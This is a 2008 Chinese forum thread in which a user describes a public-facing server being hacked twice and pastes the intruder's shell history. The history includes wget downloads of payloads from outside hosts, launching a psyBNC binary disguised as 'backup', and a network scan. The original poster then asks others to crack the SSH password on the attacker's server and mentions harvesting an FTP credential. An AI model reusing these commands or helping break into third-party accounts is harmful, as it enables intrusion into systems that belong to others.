放个主机到外网，放了两天被黑两次

LivePUB

第一次查到来源IP说是广西的，第二次是美国。\r\n\r\n第一次把系统弄的彻底起不来，第二次把所有用户密码都改掉了...\r\n\r\n幸好，还有一个会话从昨晚持续到现在，是root登录的，history查看到他们的动作：\r\n\r\n 576  wget nasuc.d.am/scan/neW.jpg\r\n  577  wget nasuc.do.am/scan/neW.jpg\r\n  578  ftp 208.100.61.2\r\n  579  ssh test@203.244.154.57 \r\n  580  ls\r\n  581  tar xzvf\r\n  582  ccd /tmp\r\n  583  ls\r\n  584  cd /tmp\r\n  585  ls\r\n  586  tar xzvf belea.tgz\r\n  587  w\r\n  588  ls\r\n  589  ls\r\n  590  cat /proc/cpuinfo\r\n  591  w\r\n  592  ls\r\n  593  passwd\r\n  594  wget\r\n  595  wget ideo.go.ro/psy6667.tgz\r\n  596  cd\r\n  597  w\r\n  598  ls\r\n  599  w\r\n  600  uname -a\r\n  601  tar xzvf psy6667.tgz\r\n  602  cd psybnc\r\n  603  chmod +x psybnc\r\n  604  mv psybnc backup\r\n  605  ./backup\r\n  606  cd\r\n  607  ls\r\n  608  cat /p[roc/cpuinfo\r\n  609  cat /proc/cpuinfo\r\n  610  cd\r\n  611  cd\r\n  612  ls\r\n  613   tar xzvf unixcod.tar.gz\r\n  614  cd unixcod\r\n  615  ./unix 218.249\r\n\r\n\r\n唉，这些人，在搞什么呢？

LivePUB

nasuc.do.am---208.100.61.2，这个网站，\r\n21、22、25端口都是开放的，ssh端口有个test帐号，谁有办法破到密码？ :right: \r\n:right:

LivePUB

ideo.go.ro\r\n\r\n扫出一个FTP帐号密码，可惜，没用啊 :shit:

LivePUB

原帖由 LivePUB 于 2008-12-12 19:51 发表 \r\nnasuc.do.am---208.100.61.2，这个网站，\r\n21、22、25端口都是开放的，ssh端口有个test帐号，谁有办法破到密码？ :right: \r\n:right:

\r\n\r\n\r\n这个，事实上是属于美国一家提供网站空间的服务商。

grjboy30

原帖由 你好吃了吗 于 2008-12-12 19:25 发表 \r\n晕死~~现在的病毒太猖狂，一定要装个诺顿什么的，恶意网站都能自动拦截的！还有就是一定要养成良好的上网习惯

\r\n冒昧的问下\r\n\r\n你买了诺顿的多少股票\r\n\r\n你所以的回复都夸它好,其用意何在?

LivePUB

:bang: \r\n\r\n原来他是个托儿啊，真没看出来～～

162062

还能行不了啊， 托都上来了。 :wuyu:

网络忏悔

:bang: \r\n\r\n原来他是个托儿啊，真没看出来～～\r\nLivePUB 发表于 2008-12-12 22:20

\r\n\r\n他已经是个死人了。

dangteng47

新建一网络工程师QQ群   58506017  ，期待你的加入~~~~~~~~